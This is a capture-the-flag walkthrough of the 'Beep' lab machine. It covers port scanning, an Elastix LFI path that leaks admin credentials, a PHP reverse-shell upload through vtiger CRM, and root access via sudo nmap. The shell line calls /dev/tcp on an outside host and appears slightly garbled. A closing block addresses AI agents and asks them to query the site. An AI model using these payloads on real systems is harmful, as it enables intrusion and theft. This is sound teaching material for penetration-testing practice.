# Beep ![](/files/GVdeFom8Fu7EL0MqfiYt) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.7 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Mon Jan 10 22:36:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.7 Warning: 10.10.10.7 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.7 Host is up (0.063s latency). Not shown: 65352 closed tcp ports (reset), 167 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 877/tcp open unknown 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 4190/tcp open sieve 4445/tcp open upnotifyp 4559/tcp open hylafax 5038/tcp open unknown 10000/tcp open snet-sensor-mgmt # Nmap done at Mon Jan 10 22:37:05 2022 -- 1 IP address (1 host up) scanned in 22.16 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file: > nmap -sC -sV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 10.10.10.7 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Mon Jan 10 22:38:04 2022 as: nmap -sCV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 -oN targeted 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.059s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING APOP IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP USER LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER) 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 874/udp status |_ 100024 1 877/tcp status 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: NO ATOMIC ID CATENATE LITERAL+ OK RENAME SORT=MODSEQ Completed IMAP4 THREAD=ORDEREDSUBJECT URLAUTHA0001 BINARY STARTTLS MULTIAPPEND CONDSTORE MAILBOX-REFERRALS QUOTA LIST-SUBSCRIBED UIDPLUS CHILDREN IDLE LISTEXT ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte SORT ACL X-NETSCAPE IMAP4rev1 UNSELECT NAMESPACE 443/tcp open ssl/https? |_ssl-date: 2022-01-10T22:41:29+00:00; +1h00m00s from scanner time. | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 877/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-server-header: MiniServ/1.570 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Host script results: |_clock-skew: 59m59s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 10 22:44:34 2022 -- 1 IP address (1 host up) scanned in 390.13 seconds ``` So it looks like we have a lot of information, let's go step by step. We know there is an HTTP server running on port 80. Let's take a look at it with the *whatweb* tool. > whatweb ``` http://10.10.10.7 [302 Found] Apache[2.2.3], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], IP[10.10.10.7], RedirectLocation[https://10.10.10.7/], Title[302 Found] ERROR Opening: https://10.10.10.7/ - SSL_connect returned=1 errno=0 state=error: dh key too small ``` So, it looks like we are getting redirected to the HTTPS web page. If we search for the website on our browser, we should see a login page by *elastix*. ![](/files/Aveq6e3TblHyTXFuj1ST) Time to look for any common exploits. I searched for *elastix* with the searchsploit tool and I got some exploits. > searchsploit elastix ``` --------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------- --------------------------------- Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py --------------------------------------------------------------- --------------------------------- ``` There is a Local File Inclusion exploit which could work. Let's take a look at it. > searchsploit -x php/webapps/37637.pl ``` #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action ``` If you append the LFI exploit path to `https://10.10.10.7` , you should be able to get the `/etc/amportal.con` file. We also could see other interesting files sush as `/etc/passwd.` ![](/files/4YAN1SLyfIdxkIGYamV9) It looks a bit messy. If we press `Ctrl+U` in order to view the source code, you should see the text a bit more organized. ![](/files/ECUKOfULuZZgxplHcpd2) And look at that! We got the user `admin` and the password `jEhdIekWmdjE`. ## Exploitation {% hint style="warning" %} At this point, there are various ways to get a shell. From logging in via ssh, to doing a shellshock attack, to taking advantage of crontab tasks via webmin, and many more. I will be exploiting the vtiger CRM. {% endhint %} Let's use gobuster to list directories on the website. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -k * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. * `-k` skips **TLS** certificate verification. ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.7 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/01/17 20:37:18 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/] /modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/] /mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/] /help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/] /static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/] /admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/] /themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/] /lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/] /var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/] /panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/] /libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/] /recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/] /configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/] /vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/] =============================================================== 2022/01/17 21:00:26 Finished =============================================================== ``` We get a lot of directories. If we go to the */vtigercrm* directory, we should see another login page. Let's try the credentials we found earlier. ![](/files/csTmKtM2OFqKblTz1O5A) And we got in! ![](/files/CUaE7Owh8V2WVM4bejg4) To spawn a reverse shell, we will have to go to *Settings* > *Module Manager* > *Company Details*. ![](/files/LFK7gl3NZ4WPpqRF2eVv) Now we are going to create a PHP file that runs at a system level a command that sends our netcat listener a shell. Then we are going to rename the PHP file with the `.jpg` extension, so that the CRM will accept it. The file should look like this: ```php // shell.php.jpg & /dev/tcp/10.10.14.14/4444 0>&1'); ?> ``` Then we upload the file into the Company Logo field. ![](/files/6AM9bs7Zae4CXpuD8KlI) Before hitting *Save*, we have to set out netcat listener. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, if we hit send, we should get the reverse shell as the user *asterisk* and we could grab the user flag. ``` listening on [any] 4444 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.10.7] 60860 bash: no job control in this shell bash-3.2$ whoami asterisk cat /home/fanis/user.txt cc9af475a7c3c3a9368515213aba4080 ``` ## Privilege Escalation Let's start the privilege escalation phase listing the sudo privileges of the *asterisk* user. > sudo -l * `-l` list user **privileges**. ``` Matching Defaults entries for asterisk on this host: env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" User asterisk may run the following commands on this host: (root) NOPASSWD: /sbin/shutdown (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/bin/yum (root) NOPASSWD: /bin/touch (root) NOPASSWD: /bin/chmod (root) NOPASSWD: /bin/chown (root) NOPASSWD: /sbin/service (root) NOPASSWD: /sbin/init (root) NOPASSWD: /usr/sbin/postmap (root) NOPASSWD: /usr/sbin/postfix (root) NOPASSWD: /usr/sbin/saslpasswd2 (root) NOPASSWD: /usr/sbin/hardware_detector (root) NOPASSWD: /sbin/chkconfig (root) NOPASSWD: /usr/sbin/elastix-helper ``` So the user *asterisk* can run quite a few binaries as sudo. {% hint style="info" %} GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions: {% endhint %} If we search for *nmap* in the *GTFOBins* list, we can see that we can spawn a shell as *root* with the sudo privilege running the following command: > sudo nmap --interactive > > nmap> !/bin/bash And that's right, we get a shell as the *root* user. All we have to do now is reap the harvest and grab the root flag. ``` whoami root cat /root/root.txt 00e47778ed36a9508c16a80bb78d3696 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/beep.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.